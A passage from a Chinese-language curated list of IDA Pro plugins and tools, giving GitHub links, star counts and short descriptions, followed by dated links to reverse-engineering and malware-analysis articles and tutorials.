### <a id="fabf03b862a776bbd8bcc4574943a65a"></a>外观&&主题
- [**723**星][7m] [Py] [zyantific/idaskins](https://github.com/zyantific/idaskins) 皮肤插件
### <a id="a8f5db3ab4bc7bc3d6ca772b3b9b0b1e"></a>固件&&嵌入式设备
- [**5228**星][2m] [Py] [refirmlabs/binwalk](https://github.com/ReFirmLabs/binwalk) 固件分析工具(命令行+IDA插件)
- [IDA插件](https://github.com/ReFirmLabs/binwalk/tree/master/src/scripts)
- [binwalk](https://github.com/ReFirmLabs/binwalk/tree/master/src/binwalk)
- [**492**星][5m] [Py] [maddiestone/idapythonembeddedtoolkit](https://github.com/maddiestone/idapythonembeddedtoolkit) 自动分析嵌入式设备的固件
### <a id="02088f4884be6c9effb0f1e9a3795e58"></a>签名(FLIRT等)&&比较(Diff)&&匹配
#### <a id="cf04b98ea9da0056c055e2050da980c1"></a>未分类
- [**421**星][1m] [C] [mcgill-dmas/kam1n0-community](https://github.com/McGill-DMaS/Kam1n0-Community) 汇编代码管理与分析平台(独立工具+IDA插件)
- 重复区段: [IDA->插件->作为辅助](#83de90385d03ac8ef27360bfcdc1ab48) |
- [IDA插件](https://github.com/McGill-DMaS/Kam1n0-Community/tree/master2.x/kam1n0-clients/ida-plugin)
- [kam1n0](https://github.com/McGill-DMaS/Kam1n0-Community/tree/master2.x/kam1n0)
#### <a id="19360afa4287236abe47166154bc1ece"></a>FLIRT签名
##### <a id="1c9d8dfef3c651480661f98418c49197"></a>FLIRT签名收集
- [**605**星][2m] [Max] [maktm/flirtdb](https://github.com/Maktm/FLIRTDB) A community driven collection of IDA FLIRT signature files
- [**321**星][5m] [push0ebp/sig-database](https://github.com/push0ebp/sig-database) IDA FLIRT Signature Database
##### <a id="a9a63d23d32c6c789ca4d2e146c9b6d0"></a>FLIRT签名生成
#### <a id="161e5a3437461dc8959cc923e6a18ef7"></a>Diff&&Match工具
- [**1554**星][13d] [Py] [joxeankoret/diaphora](https://github.com/joxeankoret/diaphora) program diffing
- [**360**星][1m] [Py] [checkpointsw/karta](https://github.com/checkpointsw/karta) source code assisted fast binary matching plugin for IDA
- [**332**星][1y] [Py] [joxeankoret/pigaios](https://github.com/joxeankoret/pigaios) A tool for matching and diffing source codes directly against binaries.
#### <a id="46c9dfc585ae59fe5e6f7ddf542fb31a"></a>Yara
- [**449**星][2m] [Py] [polymorf/findcrypt-yara](https://github.com/polymorf/findcrypt-yara) 使用Yara规则查找加密常量
- 重复区段: [IDA->插件->加密解密](#06d2caabef97cf663bd29af2b1fe270c) |
### <a id="5e91b280aab7f242cbc37d64ddbff82f"></a>IDB操作
- [**316**星][6m] [Py] [williballenthin/python-idb](https://github.com/williballenthin/python-idb) idb 文件解析和分析工具
### <a id="206ca17fc949b8e0ae62731d9bb244cb"></a>协作逆向&&多人操作相同IDB文件
- [**508**星][11m] [Py] [idarlingteam/idarling](https://github.com/IDArlingTeam/IDArling) 多人协作插件
- [**258**星][1y] [C++] [dga-mi-ssi/yaco](https://github.com/dga-mi-ssi/yaco) 利用Git版本控制,同步多人对相同二进制文件的修改
### <a id="f7d311685152ac005cfce5753c006e4b"></a>与调试器同步&&通信&&交互
- [**471**星][13d] [C] [bootleg/ret-sync](https://github.com/bootleg/ret-sync) 在反汇编工具和调试器之间同步调试会话
- 重复区段: [x64dbg->插件->新添加的](#da5688c7823802e734c39b539aa39df7) |
- [GDB插件](https://github.com/bootleg/ret-sync/tree/master/ext_gdb)
- [Ghidra插件](https://github.com/bootleg/ret-sync/tree/master/ext_ghidra)
- [IDA插件](https://github.com/bootleg/ret-sync/tree/master/ext_ida)
- [LLDB](https://github.com/bootleg/ret-sync/tree/master/ext_lldb)
- [OD](https://github.com/bootleg/ret-sync/tree/master/ext_olly1)
- [OD2](https://github.com/bootleg/ret-sync/tree/master/ext_olly2)
- [WinDgb](https://github.com/bootleg/ret-sync/tree/master/ext_windbg/sync)
- [x64dbg](https://github.com/bootleg/ret-sync/tree/master/ext_x64dbg)
- [**292**星][11m] [C] [a1ext/labeless](https://github.com/a1ext/labeless) 在IDA和调试器之间无缝同步Label/注释等
- [IDA插件](https://github.com/a1ext/labeless/tree/master/labeless_ida)
- [OD](https://github.com/a1ext/labeless/tree/master/labeless_olly)
- [OD2](https://github.com/a1ext/labeless/tree/master/labeless_olly2)
- [x64dbg](https://github.com/a1ext/labeless/tree/master/labeless_x64dbg)
### <a id="6fb7e41786c49cc3811305c520dfe9a1"></a>导入导出&与其他工具交互
#### <a id="8ad723b704b044e664970b11ce103c09"></a>未分类
#### <a id="c7066b0c388cd447e980bf0eb38f39ab"></a>Ghidra
- [**299**星][4m] [Py] [cisco-talos/ghida](https://github.com/cisco-talos/ghida) 在IDA中集成Ghidra反编译器
- 重复区段: [Ghidra->插件->与其他工具交互->IDA](#d832a81018c188bf585fcefa3ae23062) |
- [**238**星][9m] [Py] [daenerys-sre/source](https://github.com/daenerys-sre/source) 使IDA和Ghidra脚本通用, 无需修改
- 重复区段: [Ghidra->插件->与其他工具交互->IDA](#d832a81018c188bf585fcefa3ae23062) |
#### <a id="11139e7d6db4c1cef22718868f29fe12"></a>BinNavi
- [**382**星][26d] [C++] [google/binexport](https://github.com/google/binexport) 将反汇编以Protocol Buffer的形式导出为PostgreSQL数据库, 导入到BinNavi中使用
- 重复区段: [其他->BinNavi->工具](#2e4980c95871eae4ec0e76c42cc5c32f) |
#### <a id="d1ff64bee76f6749aef6100d72bfbe3a"></a>BinaryNinja
#### <a id="21ed198ae5a974877d7a635a4b039ae3"></a>Radare2
#### <a id="a1cf7f7f849b4ca2101bd31449c2a0fd"></a>Frida
#### <a id="dd0332da5a1482df414658250e6357f8"></a>IntelPin
### <a id="004c199e1dbf71769fbafcd8e58d1ead"></a>针对特定分析目标
#### <a id="5578c56ca09a5804433524047840980e"></a>未分类
#### <a id="cb59d84840e41330a7b5e275c0b81725"></a>Loader&Processor
- [**205**星][1y] [Py] [fireeye/idawasm](https://github.com/fireeye/idawasm) WebAssembly的加载器和解析器
#### <a id="1b17ac638aaa09852966306760fda46b"></a>GoLang
- [**376**星][9m] [Py] [sibears/idagolanghelper](https://github.com/sibears/idagolanghelper) 解析Go语言编译的二进制文件中的GoLang类型信息
- [**297**星][2m] [Py] [strazzere/golang_loader_assist](https://github.com/strazzere/golang_loader_assist) 辅助Go逆向
#### <a id="4c158ccc5aee04383755851844fdd137"></a>Windows驱动
- [**306**星][1y] [Py] [fsecurelabs/win_driver_plugin](https://github.com/FSecureLABS/win_driver_plugin) A tool to help when dealing with Windows IOCTL codes or reversing Windows drivers.
- [**218**星][1y] [Py] [nccgroup/driverbuddy](https://github.com/nccgroup/driverbuddy) 辅助逆向Windows内核驱动
#### <a id="315b1b8b41c67ae91b841fce1d4190b5"></a>PS3&&PS4
#### <a id="f5e51763bb09d8fd47ee575a98bedca1"></a>PDB
#### <a id="7d0681efba2cf3adaba2780330cd923a"></a>Flash&&SWF
#### <a id="841d605300beba45c3be131988514a03"></a>特定样本家族
#### <a id="ad44205b2d943cfa2fa805b2643f4595"></a>CTF
### <a id="ad68872e14f70db53e8d9519213ec039"></a>IDAPython本身
#### <a id="2299bc16945c25652e5ad4d48eae8eca"></a>未分类
- [**720**星][15d] [Py] [idapython/src](https://github.com/idapython/src) IDAPython源码
- [**373**星][3m] [Py] [tmr232/sark](https://github.com/tmr232/sark) IDAPython的高级抽象
#### <a id="c42137cf98d6042372b1fd43c3635135"></a>清单
- [**258**星][28d] [Py] [inforion/idapython-cheatsheet](https://github.com/inforion/idapython-cheatsheet) Scripts and cheatsheets for IDAPython
### <a id="846eebe73bef533041d74fc711cafb43"></a>指令参考&文档
- [**497**星][1y] [PLpgSQL] [nologic/idaref](https://github.com/nologic/idaref) 指令参考插件.
- [**449**星][4m] [C++] [alexhude/friend](https://github.com/alexhude/friend) 反汇编显示增强, 文档增强插件
- 重复区段: [IDA->插件->效率->其他](#c5b120e1779b928d860ad64ff8d23264) |
### <a id="c08ebe5b7eec9fc96f8eff36d1d5cc7d"></a>辅助脚本编写
#### <a id="45fd7cfce682c7c25b4f3fbc4c461ba2"></a>未分类
- [**282**星][2m] [Py] [fireeye/flare-emu](https://github.com/fireeye/flare-emu) 结合Unicorn引擎, 简化模拟脚本的编写
- 重复区段: [IDA->插件->模拟器集成](#b38dab81610be087bd5bc7785269b8cc) |
#### <a id="1a56a5b726aaa55ec5b7a5087d6c8968"></a>Qt
#### <a id="1721c09501e4defed9eaa78b8d708361"></a>控制台&&窗口界面
- [**269**星][1m] [Py] [eset/ipyida](https://github.com/eset/ipyida) 集成IPython控制台
#### <a id="227fbff77e3a13569ef7b007344d5d2e"></a>插件模板
#### <a id="8b19bb8cf9a5bc9e6ab045f3b4fabf6a"></a>其他语言
### <a id="dc35a2b02780cdaa8effcae2b6ce623e"></a>古老的
### <a id="e3e7030efc3b4de3b5b8750b7d93e6dd"></a>调试&&动态运行&动态数据
#### <a id="2944dda5289f494e5e636089db0d6a6a"></a>未分类
- [**395**星][1y] [C++] [cseagle/sk3wldbg](https://github.com/cseagle/sk3wldbg) 用Unicorn引擎做后端的调试插件
- 重复区段: [IDA->插件->模拟器集成](#b38dab81610be087bd5bc7785269b8cc) |
#### <a id="0fbd352f703b507853c610a664f024d1"></a>DBI数据
- [**943**星][1y] [Py] [gaasedelen/lighthouse](https://github.com/gaasedelen/lighthouse) 从DBI中收集代码覆盖情况,在IDA/Binja中映射、浏览、查看
- 重复区段: [DBI->IntelPin->工具->与其他工具交互->未分类](#e129288dfadc2ab0890667109f93a76d) |[DBI->Frida->工具->与其他工具交互->IDA](#d628ec92c9eea0c4b016831e1f6852b3) |[DBI->Frida->工具->与其他工具交互->BinaryNinja](#f9008a00e2bbc7535c88602aa79c8fd8) |
- [coverage-frida](https://github.com/gaasedelen/lighthouse/blob/master/coverage/frida/README.md) 使用Frida收集信息
- [coverage-pin](https://github.com/gaasedelen/lighthouse/blob/master/coverage/pin/README.md) 使用Pin收集覆盖信息
- [插件](https://github.com/gaasedelen/lighthouse/blob/master/plugin/lighthouse_plugin.py) 支持IDA和BinNinja
#### <a id="b31acf6c84a9506066d497af4e702bf5"></a>调试数据
- [**607**星][3m] [Py] [0xgalz/virtuailor](https://github.com/0xgalz/virtuailor) 利用IDA调试获取的信息,自动创建C++的虚表
- 重复区段: [IDA->插件->结构体->C++类](#4900b1626f10791748b20630af6d6123) |
<details>
<summary>查看详情</summary>
## 静态部分:
- 检测非直接调用
- 利用条件断点, Hook非直接调用的值赋值过程
## 动态 部分
- 创建虚表结构
- 重命名函数和虚表地址
- 给反汇编非直接调用添加结构偏移
- 给非直接调用到虚表之间添加交叉引用
## 使用
- File -> Script File -> Main.py(设置断点) -> IDA调试器执行
</details>
- [**386**星][5m] [Py] [ynvb/die](https://github.com/ynvb/die) 使用IDA调试器收集动态运行信息, 辅助静态分析
### <a id="d2166f4dac4eab7fadfe0fd06467fbc9"></a>反编译器&&AST
- [**1672**星][7m] [C++] [yegord/snowman](https://github.com/yegord/snowman) Snowman反编译器,支持x86, AMD64, ARM。有独立的GUI工具、命令行工具、IDA/Radare2/x64dbg插件,也可以作为库使用
- 重复区段: [x64dbg->插件->新添加的](#da5688c7823802e734c39b539aa39df7) |
- [IDA插件](https://github.com/yegord/snowman/tree/master/src/ida-plugin)
- [snowman](https://github.com/yegord/snowman/tree/master/src/snowman) QT界面
- [nocode](https://github.com/yegord/snowman/tree/master/src/nocode) 命令行工具
- [nc](https://github.com/yegord/snowman/tree/master/src/nc) 核心代码,可作为库使用
- [**418**星][3m] [C++] [avast/retdec-idaplugin](https://github.com/avast/retdec-idaplugin) retdec 的 IDA 插件
- [**235**星][7m] [Py] [patois/dsync](https://github.com/patois/dsync) 反汇编和反编译窗口同步插件
- 重复区段: [IDA->插件->效率->其他](#c5b120e1779b928d860ad64ff8d23264) |
### <a id="7199e8787c0de5b428f50263f965fda7"></a>反混淆
- [**1365**星][3m] [Py] [fireeye/flare-floss](https://github.com/fireeye/flare-floss) 自动从恶意代码中提取反混淆后的字符串
- 重复区段: [IDA->插件->字符串](#9dcc6c7dd980bec1f92d0cc9a2209a24) |
- [floss](https://github.com/fireeye/flare-floss/tree/master/floss)
- [IDA插件](https://github.com/fireeye/flare-floss/blob/master/scripts/idaplugin.py)
- [**304**星][4m] [C++] [rolfrolles/hexraysdeob](https://github.com/rolfrolles/hexraysdeob) 利用Hex-Rays microcode API破解编译器级别的混淆
- 重复区段: [IDA->插件->Microcode](#7a2977533ccdac70ee6e58a7853b756b) |
### <a id="fcf75a0881617d1f684bc8b359c684d7"></a>效率&&导航&&快速访问&&图形&&图像&&可视化
#### <a id="c5b120e1779b928d860ad64ff8d23264"></a>其他
- [**449**星][4m] [C++] [alexhude/friend](https://github.com/alexhude/friend) 反汇编显示增强, 文档增强插件
- 重复区段: [IDA->插件->指令参考](#846eebe73bef533041d74fc711cafb43) |
- [**372**星][3m] [Py] [l4ys/lazyida](https://github.com/l4ys/lazyida) 若干快速访问功能, 扫描字符串格式化漏洞
- 重复区段: [IDA->插件->字符串](#9dcc6c7dd980bec1f92d0cc9a2209a24) |[IDA->插件->漏洞->未分类](#385d6777d0747e79cccab0a19fa90e7e) |
<details>
<summary>查看详情</summary>
### 功能
- 快速移除函数返回类型
- 数据格式(format)快速转换
- 扫描字符串格式化漏洞
- 双击跳转vtable函数
- 快捷键: w/c/v
</details>
- [**329**星][4m] [Py] [pfalcon/scratchabit](https://github.com/pfalcon/scratchabit) 交互式反汇编工具, 有与IDAPython兼容的插件API
- [**235**星][7m] [Py] [patois/dsync](https://github.com/patois/dsync) 反汇编和反编译窗口同步插件
- 重复区段: [IDA->插件->反编译器](#d2166f4dac4eab7fadfe0fd06467fbc9) |
#### <a id="03fac5b3abdbd56974894a261ce4e25f"></a>显示增强
- [**208**星][1m] [Py] [patois/idacyber](https://github.com/patois/idacyber) 交互式数据可视化插件
#### <a id="3b1dba00630ce81cba525eea8fcdae08"></a>图形&&图像
- [**2569**星][6m] [Java] [google/binnavi](https://github.com/google/binnavi) 二进制分析IDE, 对反汇编代码的控制流程图和调用图进行探查/导航/编辑/注释.(IDA插件的作用是导出反汇编)
#### <a id="8f9468e9ab26128567f4be87ead108d7"></a>搜索
### <a id="66052f824f5054aa0f70785a2389a478"></a>Android
- [**246**星][28d] [C++] [strazzere/android-scripts](https://github.com/strazzere/android-scripts) Android逆向脚本收集
- 重复区段: [Android->工具->ReverseEngineering](#6d2b758b3269bac7d69a2d2c8b45194c) |
### <a id="2adc0044b2703fb010b3bf73b1f1ea4a"></a>Apple&&macOS&&iXxx&&Objective-C&&SWift&&Mach-O
#### <a id="8530752bacfb388f3726555dc121cb1a"></a>未分类
#### <a id="82d0fa2d6934ce29794a651513934384"></a>内核缓存
#### <a id="d249a8d09a3f25d75bb7ba8b32bd9ec5"></a>Mach-O
#### <a id="1c698e298f6112a86c12881fbd8173c7"></a>Swift
### <a id="e5e403123c70ddae7bd904d3a3005dbb"></a>ELF
### <a id="7a2977533ccdac70ee6e58a7853b756b"></a>Microcode
- [**304**星][4m] [C++] [rolfrolles/hexraysdeob](https://github.com/rolfrolles/hexraysdeob) 利用Hex-Rays microcode API破解编译器级别的混淆
- 重复区段: [IDA->插件->反混淆](#7199e8787c0de5b428f50263f965fda7) |
### <a id="b38dab81610be087bd5bc7785269b8cc"></a>模拟器集成
- [**504**星][20d] [Py] [alexhude/uemu](https://github.com/alexhude/uemu) 基于Unicorn的模拟器插件
- [**395**星][1y] [C++] [cseagle/sk3wldbg](https://github.com/cseagle/sk3wldbg) 用Unicorn引擎做后端的调试插件
- 重复区段: [IDA->插件->调试->未分类](#2944dda5289f494e5e636089db0d6a6a) |
- [**282**星][2m] [Py] [fireeye/flare-emu](https://github.com/fireeye/flare-emu) 结合Unicorn引擎, 简化模拟脚本的编写
- 重复区段: [IDA->插件->辅助脚本编写->未分类](#45fd7cfce682c7c25b4f3fbc4c461ba2) |
### <a id="83de90385d03ac8ef27360bfcdc1ab48"></a>作为辅助&&构成其他的一环
- [**1542**星][28d] [Py] [lifting-bits/mcsema](https://github.com/lifting-bits/mcsema) 将x86, amd64, aarch64二进制文件转换成LLVM字节码
- [IDA7插件](https://github.com/lifting-bits/mcsema/tree/master/tools/mcsema_disass/ida7) 用于反汇编二进制文件并生成控制流程图
- [IDA插件](https://github.com/lifting-bits/mcsema/tree/master/tools/mcsema_disass/ida) 用于反汇编二进制文件并生成控制流程图
- [Binja插件](https://github.com/lifting-bits/mcsema/tree/master/tools/mcsema_disass/binja) 用于反汇编二进制文件并生成控制流程图
- [mcsema](https://github.com/lifting-bits/mcsema/tree/master/mcsema)
- [**421**星][1m] [C] [mcgill-dmas/kam1n0-community](https://github.com/McGill-DMaS/Kam1n0-Community) 汇编代码管理与分析平台(独立工具+IDA插件)
- 重复区段: [IDA->插件->签名(FLIRT等)->未分类](#cf04b98ea9da0056c055e2050da980c1) |
- [IDA插件](https://github.com/McGill-DMaS/Kam1n0-Community/tree/master2.x/kam1n0-clients/ida-plugin)
- [kam1n0](https://github.com/McGill-DMaS/Kam1n0-Community/tree/master2.x/kam1n0)
### <a id="1ded622dca60b67288a591351de16f8b"></a>漏洞
#### <a id="385d6777d0747e79cccab0a19fa90e7e"></a>未分类
- [**492**星][7m] [Py] [danigargu/heap-viewer](https://github.com/danigargu/heap-viewer) 查看glibc堆, 主要用于漏洞开发
- [**372**星][3m] [Py] [l4ys/lazyida](https://github.com/l4ys/lazyida) 若干快速访问功能, 扫描字符串格式化漏洞
- 重复区段: [IDA->插件->字符串](#9dcc6c7dd980bec1f92d0cc9a2209a24) |[IDA->插件->效率->其他](#c5b120e1779b928d860ad64ff8d23264) |
<details>
<summary>查看详情</summary>
### 功能
- 快速移除函数返回类型
- 数据格式(format)快速转换
- 扫描字符串格式化漏洞
- 双击跳转vtable函数
- 快捷键: w/c/v
</details>
#### <a id="cf2efa7e3edb24975b92d2e26ca825d2"></a>ROP
### <a id="7d557bc3d677d206ef6c5a35ca8b3a14"></a>补丁&&Patch
- [**727**星][1y] [Py] [keystone-engine/keypatch](https://github.com/keystone-engine/keypatch) 汇编/补丁插件, 支持多架构, 基于Keystone引擎
### <a id="7dfd8abad50c14cd6bdc8d8b79b6f595"></a>其他
### <a id="90bf5d31a3897400ac07e15545d4be02"></a>函数相关
#### <a id="347a2158bdd92b00cd3d4ba9a0be00ae"></a>未分类
#### <a id="73813456eeb8212fd45e0ea347bec349"></a>重命名&&前缀&&标记
- [**291**星][3m] [Py] [a1ext/auto_re](https://github.com/a1ext/auto_re) 自动化函数重命名
#### <a id="e4616c414c24b58626f834e1be079ebc"></a>导航&&查看&&查找
#### <a id="cadae88b91a57345d266c68383eb05c5"></a>demangle
### <a id="34ac84853604a7741c61670f2a075d20"></a>污点分析&&符号执行
- [**931**星][25d] [OCaml] [airbus-seclab/bincat](https://github.com/airbus-seclab/bincat) 二进制代码静态分析工具。值分析(寄存器、内存)、污点分析、类型重建和传播(propagation)、前向/后向分析
- 重复区段: [IDA->插件->结构体->未分类](#fa5ede9a4f58d4efd98585d3158be4fb) |
### <a id="9dcc6c7dd980bec1f92d0cc9a2209a24"></a>字符串
- [**1365**星][3m] [Py] [fireeye/flare-floss](https://github.com/fireeye/flare-floss) 自动从恶意代码中提取反混淆后的字符串
- 重复区段: [IDA->插件->反混淆](#7199e8787c0de5b428f50263f965fda7) |
- [floss](https://github.com/fireeye/flare-floss/tree/master/floss)
- [IDA插件](https://github.com/fireeye/flare-floss/blob/master/scripts/idaplugin.py)
- [**372**星][3m] [Py] [l4ys/lazyida](https://github.com/l4ys/lazyida) 若干快速访问功能, 扫描字符串格式化漏洞
- 重复区段: [IDA->插件->效率->其他](#c5b120e1779b928d860ad64ff8d23264) |[IDA->插件->漏洞->未分类](#385d6777d0747e79cccab0a19fa90e7e) |
<details>
<summary>查看详情</summary>
### 功能
- 快速移除函数返回类型
- 数据格式(format)快速转换
- 扫描字符串格式化漏洞
- 双击跳转vtable函数
- 快捷键: w/c/v
</details>
### <a id="06d2caabef97cf663bd29af2b1fe270c"></a>加密解密
- [**449**星][2m] [Py] [polymorf/findcrypt-yara](https://github.com/polymorf/findcrypt-yara) 使用Yara规则查找加密常量
- 重复区段: [IDA->插件->签名(FLIRT等)->Yara](#46c9dfc585ae59fe5e6f7ddf542fb31a) |
***
## <a id="18c6a45392d6b383ea24b363d2f3e76b"></a>文章
### <a id="37634a992983db427ce41b37dd9a98c2"></a>新添加的
- 2019.12 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P27)](https://medium.com/p/5fa5c173547c)
- 2019.12 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P26)](https://medium.com/p/f3fc8d187258)
- 2019.12 [knownsec] [使用 IDA 处理 U-Boot 二进制流文件](https://blog.knownsec.com/2019/12/%e4%bd%bf%e7%94%a8-ida-%e5%a4%84%e7%90%86-u-boot-%e4%ba%8c%e8%bf%9b%e5%88%b6%e6%b5%81%e6%96%87%e4%bb%b6/)
- 2019.12 [venus] [使用 IDA 处理 U-Boot 二进制流文件](https://paper.seebug.org/1090/)
- 2019.11 [hexblog] [Extending IDA processor modules for GDB debugging](http://www.hexblog.com/?p=1371)
- 2019.11 [0x48] [使用IDA处理U-Boot二进制流文件](https://nobb.site/2019/11/29/0x57/)
- 2019.11 [aliyun] [使用IDA microcode去除ollvm混淆(上)](https://xz.aliyun.com/t/6749)
- 2019.10 [cisco] [New IDA Pro plugin provides TileGX support](https://blogs.cisco.com/security/talos/new-ida-pro-plugin-provides-tilegx-support)
- 2019.09 [cisco] [GhIDA: Ghidra decompiler for IDA Pro](https://blogs.cisco.com/security/talos/ghida-ghidra-decompiler-for-ida-pro)
- 2019.09 [cn0xroot] [Fix IDA Crash bug on osx 10.14](https://cn0xroot.com/2019/09/02/fix-ida-crash-bug-on-osx-10-14/)
- 2019.08 [hexblog] [IDA 7.4: IDAPython and Python 3](http://www.hexblog.com/?p=1355)
- 2019.08 [hexblog] [IDA 7.4: Turning off IDA 6.x compatibility in IDAPython by default](http://www.hexblog.com/?p=1352)
- 2019.06 [hitbsecconf] [#HITB2019AMS D1T2 - fn_fuzzy: Fast Multiple Binary Diffing Triage With IDA - Takahiro Haruyama](https://www.youtube.com/watch?v=kkvNebE9amY)
- 2019.05 [aliyun] [欺骗IDA F5参数识别](https://xz.aliyun.com/t/5186)
- 2019.05 [aliyun] [混淆IDA F5的一个小技巧-x64](https://xz.aliyun.com/t/4994)
- 2018.11 [4hou] [使用IDAPython自动映射二进制文件替换默认函数名](http://www.4hou.com/technology/14149.html)
- 2018.10 [WarrantyVoider] [Ida Pro Tutorial - Compare Reverse Engineering](https://www.youtube.com/watch?v=7-OytQJRwtE)
- 2018.06 [freebuf] [MindshaRE:如何利用IDA Python浏览WINDOWS内核](http://www.freebuf.com/articles/system/173269.html)
- 2018.05 [WarrantyVoider] [Tutorial - Debugging In Source Code With IDA Pro](https://www.youtube.com/watch?v=Jgb3KTVg-rY)
- 2018.03 [BinaryAdventure] [x86 In-Depth 4: Labeling Structs Properly in IDA Pro](https://www.youtube.com/watch?v=X3xCwNt2ZVY)
### <a id="4187e477ebc45d1721f045da62dbf4e8"></a>未分类
- 2018.05 [tradahacking] [使用IDA和辅助工具比较二进制文件](https://medium.com/p/651e62117695)
- 2018.04 [pediy] [[翻译]IDAPython-Book(Alexander Hanel)](https://bbs.pediy.com/thread-225920.htm)
- 2018.03 [hexblog] [IDA on non-OS X/Retina Hi-DPI displays](http://www.hexblog.com/?p=1180)
- 2018.03 [pediy] [[翻译]IDA v6.5 文本执行](https://bbs.pediy.com/thread-225514.htm)
- 2018.02 [pediy] [[原创]逆向技术之熟悉IDA工具](https://bbs.pediy.com/thread-224499.htm)
- 2018.01 [pediy] [[原创]ARM Linux下搭建IDA Pro远程调试环境](https://bbs.pediy.com/thread-224337.htm)
- 2018.01 [pediy] [[翻译]对抗IDA Pro调试器ARM反汇编的技巧](https://bbs.pediy.com/thread-223894.htm)
- 2017.12 [OALabs] [Debugging shellcode using BlobRunner and IDA Pro](https://www.youtube.com/watch?v=q9q8dy-2Jeg)
- 2017.12 [pediy] [[原创]IDA7.0 Mac 插件编译指南](https://bbs.pediy.com/thread-223211.htm)
- 2017.12 [pediy] [[原创]IDA 插件- FRIEND 的安装和使用](https://bbs.pediy.com/thread-223156.htm)
- 2017.12 [BinaryAdventure] [IDAPython Tutorial with example script](https://www.youtube.com/watch?v=5ehI2wgcSGo)
- 2017.11 [OALabs] [How To Defeat Anti-VM and Anti-Debug Packers With IDA Pro](https://www.youtube.com/watch?v=WlE8abc8V-4)
- 2017.11 [pediy] [[原创]IDAPython脚本分享 - 自动在JNI_OnLoad下断点](https://bbs.pediy.com/thread-222998.htm)
- 2017.11 [pediy] [[求助]IDA Pro调试so,附加完毕,跳到目标so基址,但是内容都是DCB伪指令?](https://bbs.pediy.com/thread-222646.htm)
- 2017.11 [OALabs] [IDA Pro Malware Analysis Tips](https://www.youtube.com/watch?v=qCQRKLaz2nQ)
- 2017.10 [hexblog] [IDA and common Python issues](http://www.hexblog.com/?p=1132)
- 2017.10 [pediy] [[分享]IDA + VMware 调试win7 x64](https://bbs.pediy.com/thread-221884.htm)
- 2017.06 [pediy] [[翻译]IDA Hex-Rays反编译器使用的一些小技巧](https://bbs.pediy.com/thread-218780.htm)
- 2017.06 [qmemcpy] [IDA series, part 2: debugging a .NET executable](https://qmemcpy.io/post/ida-series-2-debugging-net)
- 2017.06 [qmemcpy] [IDA series, part 1: the Hex-Rays decompiler](https://qmemcpy.io/post/ida-series-1-hex-rays)
### <a id="a4bd25d3dc2f0be840e39674be67d66b"></a>Tips&&Tricks
- 2019.07 [kienbigmummy] [Cách export data trong IDA](https://medium.com/p/d4c8128704f)
- 2019.07 [hexacorn] [Batch decompilation with IDA / Hex-Rays Decompiler](http://www.hexacorn.com/blog/2019/07/04/batch-decompilation-with-ida-hex-rays-decompiler/)
- 2019.06 [openanalysis] [Disable ASLR for Easier Malware Debugging With x64dbg and IDA Pro](https://oalabs.openanalysis.net/2019/06/12/disable-aslr-for-easier-malware-debugging/)
- 2019.06 [OALabs] [Disable ASLR For Easier Malware Debugging With x64dbg and IDA Pro](https://www.youtube.com/watch?v=DGX7oZvdmT0)
- 2019.06 [openanalysis] [Reverse Engineering C++ Malware With IDA Pro: Classes, Constructors, and Structs](https://oalabs.openanalysis.net/2019/06/03/reverse-engineering-c-with-ida-pro-classes-constructors-and-structs/)
- 2019.06 [OALabs] [Reverse Engineering C++ Malware With IDA Pro](https://www.youtube.com/watch?v=o-FFGIloxvE)
- 2019.03 [aliyun] [IDA Pro7.0使用技巧总结](https://xz.aliyun.com/t/4205)
- 2018.06 [checkpoint] [Scriptable Remote Debugging with Windbg and IDA Pro](https://research.checkpoint.com/scriptable-remote-debugging-windbg-ida-pro/)
- 2015.07 [djmanilaice] [在PyCharm中编写IDAPython脚本时自动提示](http://djmanilaice.blogspot.com/2015/07/pycharm-for-your-ida-development.html)
- 2015.07 [djmanilaice] [使用IDA自动打开当前目录下的DLL和EXE](http://djmanilaice.blogspot.com/2015/07/auto-open-dlls-and-exe-in-current.html)
### <a id="04cba8dbb72e95d9c721fe16a3b48783"></a>系列文章-Labeless插件介绍
- 2018.10 [checkpoint] [Labeless Part 6: How to Resolve Obfuscated API Calls in the Ngioweb Proxy Malware - Check Point Research](https://research.checkpoint.com/labeless-part-6-how-to-resolve-obfuscated-api-calls-in-the-ngioweb-proxy-malware/)
- 2018.10 [checkpoint] [Labeless Part 5: How to Decrypt Strings in Boleto Banking Malware Without Reconstructing Decryption Algorithm. - Check Point Research](https://research.checkpoint.com/labeless-part-5-how-to-decrypt-strings-in-boleto-banking-malware-without-reconstructing-decryption-algorithm/)
- 2018.10 [checkpoint] [Labeless Part 4: Scripting - Check Point Research](https://research.checkpoint.com/labeless-part-4-scripting/)
- 2018.08 [checkpoint] [Labeless Part 3: How to Dump and Auto-Resolve WinAPI Calls in LockPos Point-of-Sale Malware - Check Point Research](https://research.checkpoint.com/19558-2/)
- 2018.08 [checkpoint] [Labeless Part 2: Installation - Check Point Research](https://research.checkpoint.com/installing-labeless/)
- 2018.08 [checkpoint] [Labeless Part 1: An Introduction - Check Point Research](https://research.checkpoint.com/labeless-an-introduction/)
### <a id="1a2e56040cfc42c11c5b4fa86978cc19"></a>系列文章-使用IDA从零开始学逆向
- 2019.11 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P25)](https://medium.com/p/304110bdf635)
- 2019.10 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P24)](https://medium.com/p/66451e50163e)
- 2019.10 [tradahacking] [REVERSING WITH IDA FROM SCRATCH (P23)](https://medium.com/p/a03897f960be)
- 2019.09 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P21)](https://medium.com/p/17ce2ee804af)
- 2019.08 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P20)](https://medium.com/p/adc2bad58cc3)
- 2019.08 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P19)](https://medium.com/p/b8a5ccc0efbc)
- 2019.07 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P18)](https://medium.com/p/b9b5987eea22)
- 2019.07 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P17)](https://medium.com/p/13aae3c33824)
- 2019.06 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P16)](https://medium.com/p/66c697636724)
- 2019.06 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P15)](https://medium.com/p/9bb2bbdf6fbc)
- 2019.05 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P14)](https://medium.com/p/fd20c144c844)
